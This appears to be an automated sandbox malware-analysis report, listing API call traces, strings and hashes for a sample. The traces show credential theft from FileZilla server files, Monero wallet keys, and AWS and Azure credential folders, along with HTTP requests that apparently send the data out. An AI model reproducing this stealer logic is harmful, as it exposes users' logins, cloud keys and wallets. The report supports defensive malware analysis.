                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: cbe85fcbaa6f7551f87c5a93e9b1ca67ddffae9f3599d1b593fe367da174be86
                      • Instruction ID: 7aea118a593b7dc61a28cb16a90227f0cd87fae9109007b2d2839a9eccff845f
                      • Opcode Fuzzy Hash: cbe85fcbaa6f7551f87c5a93e9b1ca67ddffae9f3599d1b593fe367da174be86
                      • Instruction Fuzzy Hash: E4517DF3E081049BE704AE3DDC0577BBBA6DBD0320F1A863DE6D4977C8E93958058686
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a97b191731f40872dd52c1b34a63bd2bfda4f9c95931d5fc4a0d983161a45cc3
                      • Instruction ID: 68ada515132c1e5d836974d18e78b6c54dace3b57fec0969254dff51938a0957
                      • Opcode Fuzzy Hash: a97b191731f40872dd52c1b34a63bd2bfda4f9c95931d5fc4a0d983161a45cc3
                      • Instruction Fuzzy Hash: 0541CBF391C64D9FD3545E2A9C4963BB6E4FB86328F35063DE292D7B44F9718D009282
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: d79908adf1086acd139cc5cdb2a27021a348ce0d7c488b0b296925c12624d5dd
                      • Instruction ID: d1b86eae5683ef617227ac055a6e640039a9d955e5041ebe1ee9ece425714b66
                      • Opcode Fuzzy Hash: d79908adf1086acd139cc5cdb2a27021a348ce0d7c488b0b296925c12624d5dd
                      • Instruction Fuzzy Hash: 05416AF3A0C3009BE3486E2DED95737B7D6EB84720F25843DE985C3384E97598014656
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                      • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                      • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                      • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                      APIs
                        • Part of subcall function 0047A740: lstrcpy.KERNEL32(00480E17,00000000), ref: 0047A788
                        • Part of subcall function 00478DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00478E0B
                        • Part of subcall function 0047A920: lstrcpy.KERNEL32(00000000,?), ref: 0047A972
                        • Part of subcall function 0047A920: lstrcat.KERNEL32(00000000), ref: 0047A982
                        • Part of subcall function 0047A8A0: lstrcpy.KERNEL32(?,00480E17), ref: 0047A905
                        • Part of subcall function 0047A9B0: lstrlen.KERNEL32(?,00E888E0,?,\Monero\wallet.keys,00480E17), ref: 0047A9C5
                        • Part of subcall function 0047A9B0: lstrcpy.KERNEL32(00000000), ref: 0047AA04
                        • Part of subcall function 0047A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0047AA12
                        • Part of subcall function 0047A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0047A7E6
                        • Part of subcall function 004699C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004699EC
                        • Part of subcall function 004699C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00469A11
                        • Part of subcall function 004699C0: LocalAlloc.KERNEL32(00000040,?), ref: 00469A31
                        • Part of subcall function 004699C0: ReadFile.KERNEL32(000000FF,?,00000000,0046148F,00000000), ref: 00469A5A
                        • Part of subcall function 004699C0: LocalFree.KERNEL32(0046148F), ref: 00469A90
                        • Part of subcall function 004699C0: CloseHandle.KERNEL32(000000FF), ref: 00469A9A
                        • Part of subcall function 00478E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00478E52
                      • GetProcessHeap.KERNEL32(00000000,000F423F,00480DBA,00480DB7,00480DB6,00480DB3), ref: 00470362
                      • RtlAllocateHeap.NTDLL(00000000), ref: 00470369
                      • StrStrA.SHLWAPI(00000000,<Host>), ref: 00470385
                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00480DB2), ref: 00470393
                      • StrStrA.SHLWAPI(00000000,<Port>), ref: 004703CF
                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00480DB2), ref: 004703DD
                      • StrStrA.SHLWAPI(00000000,<User>), ref: 00470419
                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00480DB2), ref: 00470427
                      • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00470463
                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00480DB2), ref: 00470475
                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00480DB2), ref: 00470502
                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00480DB2), ref: 0047051A
                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00480DB2), ref: 00470532
                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00480DB2), ref: 0047054A
                      • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00470562
                      • lstrcat.KERNEL32(?,profile: null), ref: 00470571
                      • lstrcat.KERNEL32(?,url: ), ref: 00470580
                      • lstrcat.KERNEL32(?,00000000), ref: 00470593
                      • lstrcat.KERNEL32(?,00481678), ref: 004705A2
                      • lstrcat.KERNEL32(?,00000000), ref: 004705B5
                      • lstrcat.KERNEL32(?,0048167C), ref: 004705C4
                      • lstrcat.KERNEL32(?,login: ), ref: 004705D3
                      • lstrcat.KERNEL32(?,00000000), ref: 004705E6
                      • lstrcat.KERNEL32(?,00481688), ref: 004705F5
                      • lstrcat.KERNEL32(?,password: ), ref: 00470604
                      • lstrcat.KERNEL32(?,00000000), ref: 00470617
                      • lstrcat.KERNEL32(?,00481698), ref: 00470626
                      • lstrcat.KERNEL32(?,0048169C), ref: 00470635
                      • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00480DB2), ref: 0047068E
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                      • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                      • API String ID: 1942843190-555421843
                      • Opcode ID: d5403a31484e6a96d63738ed1dd4060431219fe0a8cd76aa5a7df71d49300638
                      • Instruction ID: 45d7dd7d24f1fafcc32acfad96209c342d0ea9bc66092620dab54c48756bddf2
                      • Opcode Fuzzy Hash: d5403a31484e6a96d63738ed1dd4060431219fe0a8cd76aa5a7df71d49300638
                      • Instruction Fuzzy Hash: 5CD14171900108ABCB04FBF5DD96EEE7379AF54304F54841EF106B6091EF78AA16CB6A
                      APIs
                        • Part of subcall function 0047A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0047A7E6
                        • Part of subcall function 004647B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00464839
                        • Part of subcall function 004647B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00464849
                        • Part of subcall function 0047A740: lstrcpy.KERNEL32(00480E17,00000000), ref: 0047A788
                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004659F8
                      • StrCmpCA.SHLWAPI(?,00E8E2F0), ref: 00465A13
                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00465B93
                      • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,00E8E260,00000000,?,00E89F78,00000000,?,00481A1C), ref: 00465E71
                      • lstrlen.KERNEL32(00000000), ref: 00465E82
                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00465E93
                      • RtlAllocateHeap.NTDLL(00000000), ref: 00465E9A
                      • lstrlen.KERNEL32(00000000), ref: 00465EAF
                      • lstrlen.KERNEL32(00000000), ref: 00465ED8
                      • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00465EF1
                      • lstrlen.KERNEL32(00000000,?,?), ref: 00465F1B
                      • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00465F2F
                      • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00465F4C
                      • InternetCloseHandle.WININET(00000000), ref: 00465FB0
                      • InternetCloseHandle.WININET(00000000), ref: 00465FBD
                      • HttpOpenRequestA.WININET(00000000,00E8E270,?,00E8DCF8,00000000,00000000,00400100,00000000), ref: 00465BF8
                        • Part of subcall function 0047A9B0: lstrlen.KERNEL32(?,00E888E0,?,\Monero\wallet.keys,00480E17), ref: 0047A9C5
                        • Part of subcall function 0047A9B0: lstrcpy.KERNEL32(00000000), ref: 0047AA04
                        • Part of subcall function 0047A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0047AA12
                        • Part of subcall function 0047A8A0: lstrcpy.KERNEL32(?,00480E17), ref: 0047A905
                        • Part of subcall function 0047A920: lstrcpy.KERNEL32(00000000,?), ref: 0047A972
                        • Part of subcall function 0047A920: lstrcat.KERNEL32(00000000), ref: 0047A982
                      • InternetCloseHandle.WININET(00000000), ref: 00465FC7
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                      • String ID: "$"$------$------$------$`$p
                      • API String ID: 874700897-3415936598
                      • Opcode ID: f7f5dbd531b0b1a544b91979e3a0057ad1d94dabefd445700e4bfeeb105d7226
                      • Instruction ID: 51cd60e2f3e6057880fc6f04db6b1a72f31afdea08cce2fb3c169fd9932a7b17
                      • Opcode Fuzzy Hash: f7f5dbd531b0b1a544b91979e3a0057ad1d94dabefd445700e4bfeeb105d7226
                      • Instruction Fuzzy Hash: 391243B1820118ABCB14FBA1DC95FEE7378BF54704F10855EF10A62091EF786A59CF6A
                      APIs
                        • Part of subcall function 0047A740: lstrcpy.KERNEL32(00480E17,00000000), ref: 0047A788
                        • Part of subcall function 0047A9B0: lstrlen.KERNEL32(?,00E888E0,?,\Monero\wallet.keys,00480E17), ref: 0047A9C5
                        • Part of subcall function 0047A9B0: lstrcpy.KERNEL32(00000000), ref: 0047AA04
                        • Part of subcall function 0047A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0047AA12
                        • Part of subcall function 0047A8A0: lstrcpy.KERNEL32(?,00480E17), ref: 0047A905
                        • Part of subcall function 00478B60: GetSystemTime.KERNEL32(00480E1A,00E89FA8,004805AE,?,?,004613F9,?,0000001A,00480E1A,00000000,?,00E888E0,?,\Monero\wallet.keys,00480E17), ref: 00478B86
                        • Part of subcall function 0047A920: lstrcpy.KERNEL32(00000000,?), ref: 0047A972
                        • Part of subcall function 0047A920: lstrcat.KERNEL32(00000000), ref: 0047A982
                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0046CF83
                      • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0046D0C7
                      • RtlAllocateHeap.NTDLL(00000000), ref: 0046D0CE
                      • lstrcat.KERNEL32(?,00000000), ref: 0046D208
                      • lstrcat.KERNEL32(?,00481478), ref: 0046D217
                      • lstrcat.KERNEL32(?,00000000), ref: 0046D22A
                      • lstrcat.KERNEL32(?,0048147C), ref: 0046D239
                      • lstrcat.KERNEL32(?,00000000), ref: 0046D24C
                      • lstrcat.KERNEL32(?,00481480), ref: 0046D25B
                      • lstrcat.KERNEL32(?,00000000), ref: 0046D26E
                      • lstrcat.KERNEL32(?,00481484), ref: 0046D27D
                      • lstrcat.KERNEL32(?,00000000), ref: 0046D290
                      • lstrcat.KERNEL32(?,00481488), ref: 0046D29F
                      • lstrcat.KERNEL32(?,00000000), ref: 0046D2B2
                      • lstrcat.KERNEL32(?,0048148C), ref: 0046D2C1
                      • lstrcat.KERNEL32(?,00000000), ref: 0046D2D4
                      • lstrcat.KERNEL32(?,00481490), ref: 0046D2E3
                        • Part of subcall function 0047A820: lstrlen.KERNEL32(00464F05,?,?,00464F05,00480DDE), ref: 0047A82B
                        • Part of subcall function 0047A820: lstrcpy.KERNEL32(00480DDE,00000000), ref: 0047A885
                      • lstrlen.KERNEL32(?), ref: 0046D32A
                      • lstrlen.KERNEL32(?), ref: 0046D339
                        • Part of subcall function 0047AA70: StrCmpCA.SHLWAPI(00E88B30,0046A7A7,?,0046A7A7,00E88B30), ref: 0047AA8F
                      • DeleteFileA.KERNEL32(00000000), ref: 0046D3B4
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                      • String ID:
                      • API String ID: 1956182324-0
                      • Opcode ID: ac0780cd199e06d85c3ca92aa1f5c967d4045287c9db4d393dee95f07db265bf
                      • Instruction ID: 5dd28875c5e3dcb2a1f255f6bf5ca84dbeeba528b83ac8cac0bb87583a7504c2
                      • Opcode Fuzzy Hash: ac0780cd199e06d85c3ca92aa1f5c967d4045287c9db4d393dee95f07db265bf
                      • Instruction Fuzzy Hash: ABE13071910108ABCB04FBA1DD96EEE7379AF54305F10855AF10AA6091DF38BE16CF6B
                      APIs
                        • Part of subcall function 0047A740: lstrcpy.KERNEL32(00480E17,00000000), ref: 0047A788
                        • Part of subcall function 0047A920: lstrcpy.KERNEL32(00000000,?), ref: 0047A972
                        • Part of subcall function 0047A920: lstrcat.KERNEL32(00000000), ref: 0047A982
                        • Part of subcall function 0047A8A0: lstrcpy.KERNEL32(?,00480E17), ref: 0047A905
                        • Part of subcall function 0047A9B0: lstrlen.KERNEL32(?,00E888E0,?,\Monero\wallet.keys,00480E17), ref: 0047A9C5
                        • Part of subcall function 0047A9B0: lstrcpy.KERNEL32(00000000), ref: 0047AA04
                        • Part of subcall function 0047A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0047AA12
                      • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,00E8C928,00000000,?,0048144C,00000000,?,?), ref: 0046CA6C
                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0046CA89
                      • GetFileSize.KERNEL32(00000000,00000000), ref: 0046CA95
                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0046CAA8
                      • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0046CAD9
                      • StrStrA.SHLWAPI(?,00E8CAD8,00480B52), ref: 0046CAF7
                      • StrStrA.SHLWAPI(00000000,00E8C970), ref: 0046CB1E
                      • StrStrA.SHLWAPI(?,00E8D3D8,00000000,?,00481458,00000000,?,00000000,00000000,?,00E88A70,00000000,?,00481454,00000000,?), ref: 0046CCA2
                      • StrStrA.SHLWAPI(00000000,00E8D098), ref: 0046CCB9
                        • Part of subcall function 0046C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0046C871
                        • Part of subcall function 0046C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0046C87C
                      • StrStrA.SHLWAPI(?,00E8D098,00000000,?,0048145C,00000000,?,00000000,00E88AA0), ref: 0046CD5A
                      • StrStrA.SHLWAPI(00000000,00E88940), ref: 0046CD71
                        • Part of subcall function 0046C820: lstrcat.KERNEL32(?,00480B46), ref: 0046C943
                        • Part of subcall function 0046C820: lstrcat.KERNEL32(?,00480B47), ref: 0046C957
                        • Part of subcall function 0046C820: lstrcat.KERNEL32(?,00480B4E), ref: 0046C978
                      • lstrlen.KERNEL32(00000000), ref: 0046CE44
                      • CloseHandle.KERNEL32(00000000), ref: 0046CE9C
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                      • String ID:
                      • API String ID: 3744635739-3916222277
                      • Opcode ID: b9631f06619d797fec6ab2edc97b561ecda5c87310a0377a757f24b1999f7c85
                      • Instruction ID: 57b0922e0cec47808873e066310923f5befa6f330f967e082f46e7d229769f42
                      • Opcode Fuzzy Hash: b9631f06619d797fec6ab2edc97b561ecda5c87310a0377a757f24b1999f7c85
                      • Instruction Fuzzy Hash: 36E114B1800108ABDB14FBA1DC91FEEB779AF54304F00855EF11A67191DF386A5ACF6A
                      APIs
                        • Part of subcall function 0047A740: lstrcpy.KERNEL32(00480E17,00000000), ref: 0047A788
                      • RegOpenKeyExA.ADVAPI32(00000000,00E8AD40,00000000,00020019,00000000,004805B6), ref: 004783A4
                      • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00478426
                      • wsprintfA.USER32 ref: 00478459
                      • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0047847B
                      • RegCloseKey.ADVAPI32(00000000), ref: 0047848C
                      • RegCloseKey.ADVAPI32(00000000), ref: 00478499
                        • Part of subcall function 0047A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0047A7E6
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CloseOpenlstrcpy$Enumwsprintf
                      • String ID: - $%s\%s$?
                      • API String ID: 3246050789-3278919252
                      • Opcode ID: 3911c0d336b22c3572624e340a1a6666133e89d5fcb503a6b312c3c86f9b2193
                      • Instruction ID: ef246e027e8e8f97fdc799b347b6e83ab249c15b122dc4648143332cb1ef6419
                      • Opcode Fuzzy Hash: 3911c0d336b22c3572624e340a1a6666133e89d5fcb503a6b312c3c86f9b2193
                      • Instruction Fuzzy Hash: 928140B1910118ABDB24EB54CC85FEE77B9BF48704F00C6DAE109A6140DF756B89CFA5
                      APIs
                        • Part of subcall function 00478DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00478E0B
                      • lstrcat.KERNEL32(?,00000000), ref: 00474DB0
                      • lstrcat.KERNEL32(?,\.azure\), ref: 00474DCD
                        • Part of subcall function 00474910: wsprintfA.USER32 ref: 0047492C
                        • Part of subcall function 00474910: FindFirstFileA.KERNEL32(?,?), ref: 00474943
                      • lstrcat.KERNEL32(?,00000000), ref: 00474E3C
                      • lstrcat.KERNEL32(?,\.aws\), ref: 00474E59
                        • Part of subcall function 00474910: StrCmpCA.SHLWAPI(?,00480FDC), ref: 00474971
                        • Part of subcall function 00474910: StrCmpCA.SHLWAPI(?,00480FE0), ref: 00474987
                        • Part of subcall function 00474910: FindNextFileA.KERNEL32(000000FF,?), ref: 00474B7D
                        • Part of subcall function 00474910: FindClose.KERNEL32(000000FF), ref: 00474B92
                      • lstrcat.KERNEL32(?,00000000), ref: 00474EC8
                      • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00474EE5
                        • Part of subcall function 00474910: wsprintfA.USER32 ref: 004749B0
                        • Part of subcall function 00474910: StrCmpCA.SHLWAPI(?,004808D2), ref: 004749C5
                        • Part of subcall function 00474910: wsprintfA.USER32 ref: 004749E2
                        • Part of subcall function 00474910: PathMatchSpecA.SHLWAPI(?,?), ref: 00474A1E
                        • Part of subcall function 00474910: lstrcat.KERNEL32(?,00E8E230), ref: 00474A4A
                        • Part of subcall function 00474910: lstrcat.KERNEL32(?,00480FF8), ref: 00474A5C
                        • Part of subcall function 00474910: lstrcat.KERNEL32(?,?), ref: 00474A70
                        • Part of subcall function 00474910: lstrcat.KERNEL32(?,00480FFC), ref: 00474A82
                        • Part of subcall function 00474910: lstrcat.KERNEL32(?,?), ref: 00474A96
                        • Part of subcall function 00474910: CopyFileA.KERNEL32(?,?,00000001), ref: 00474AAC
                        • Part of subcall function 00474910: DeleteFileA.KERNEL32(?), ref: 00474B31
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                      • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                      • API String ID: 949356159-974132213
                      • Opcode ID: ec4fbc30593c54f150bb90d0010af6d879f40ff1f7dc842cb0a5ffeccce92feb
                      • Instruction ID: 1c988d9fff92735ba6d22ff05380123f458901efb71f526e30406b521f979da4
                      • Opcode Fuzzy Hash: ec4fbc30593c54f150bb90d0010af6d879f40ff1f7dc842cb0a5ffeccce92feb
